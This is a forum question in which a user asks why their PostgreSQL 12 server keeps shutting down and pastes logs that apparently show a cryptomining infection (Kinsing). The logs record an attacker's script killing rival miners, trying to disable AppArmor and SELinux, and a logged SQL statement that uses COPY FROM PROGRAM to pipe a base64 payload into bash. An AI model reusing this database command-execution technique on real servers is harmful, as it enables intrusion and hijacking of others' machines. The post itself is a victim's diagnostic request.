<分区>
在过去的两天里,我的postgres 数据库服务器意外关闭了五六次,通常是在服务器流量处于最低水平时。 所以我检查了 postgresql 日志:
2021-09-18 10:17:36.099 GMT [22856] LOG: received smart shutdown request
2021-09-18 10:17:36.111 GMT [22856] LOG: background worker "logical replication launcher" (PID 22863) exited with exit code 1
grep: Trailing backslash
kill: (28): Operation not permitted
2021-09-18 10:17:39.601 GMT [55614] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.603 GMT [55622] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.686 GMT [55635] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.688 GMT [55636] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.718 GMT [55642] XXX@XXX FATAL: the database system is shutting down
2021-09-18 10:17:39.720 GMT [55643] XXX@XXX FATAL: the database system is shutting down
kill: (55736): No such process
kill: (55741): No such process
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Failed to stop c3pool_miner.service: Interactive authentication required.
See system logs and 'systemctl status c3pool_miner.service' for details.
pkill: killing pid 654 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
pkill: killing pid 717 failed: Operation not permitted
log_rot: no process found
chattr: No such file or directory while trying to stat /etc/ld.so.preload
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: cannot remove '/var/tmp/lib': No such file or directory
rm: cannot remove '/var/tmp/.lib': No such file or directory
chattr: No such file or directory while trying to stat /tmp/lok
chmod: cannot access '/tmp/lok': No such file or directory
bash: line 525: docker: command not found
bash: line 526: docker: command not found
bash: line 527: docker: command not found
bash: line 528: docker: command not found
bash: line 529: docker: command not found
bash: line 530: docker: command not found
bash: line 531: docker: command not found
bash: line 532: docker: command not found
bash: line 533: docker: command not found
bash: line 534: docker: command not found
bash: line 547: setenforce: command not found
bash: line 548: /etc/selinux/config: Permission denied
Failed to stop apparmor.service: Interactive authentication required.
See system logs and 'systemctl status apparmor.service' for details.
Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install disable apparmor
Failed to reload daemon: Interactive authentication required.
update-rc.d: error: Permission denied
Failed to stop aliyun.service.service: Interactive authentication required.
See system logs and 'systemctl status aliyun.service.service' for details.
Failed to disable unit: Interactive authentication required.
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
2021-09-18 10:17:49.860 GMT [54832] admin@postgres FATAL: terminating connection due to administrator command
2021-09-18 10:17:49.860 GMT [54832] admin@postgres CONTEXT: COPY uegplqsl, line 1: "/tmp/kinsing exists"
2021-09-18 10:17:49.860 GMT [54832] admin@postgres STATEMENT: DROP TABLE IF EXISTS XXX;CREATE TABLE XXX(cmd_output text);COPY XXXFROM PROGRAM 'echo ... |base64 -d|bash';SELECT * FROM XXX;DROP TABLE IF EXISTS XXX;
2021-09-18 10:17:49.877 GMT [22858] LOG: shutting down
2021-09-18 10:17:49.907 GMT [22856] LOG: database system is shut down
我了解到这可能是另一个进程向数据库服务器发送 SIGTERM、SIGINT 或 SIGQUIT 信号。所以我使用 systemtap 来捕捉任何关闭数据库服务器的信号。 postgresql 再次关闭后,我得到了这个:
现在我有了这些发送关闭信号的进程的 PID。我能做些什么来防止这种情况再次发生?
VPS operating system is Ubuntu 20.04.3 LTS. The backend is written in Django and database is Postgresql 12.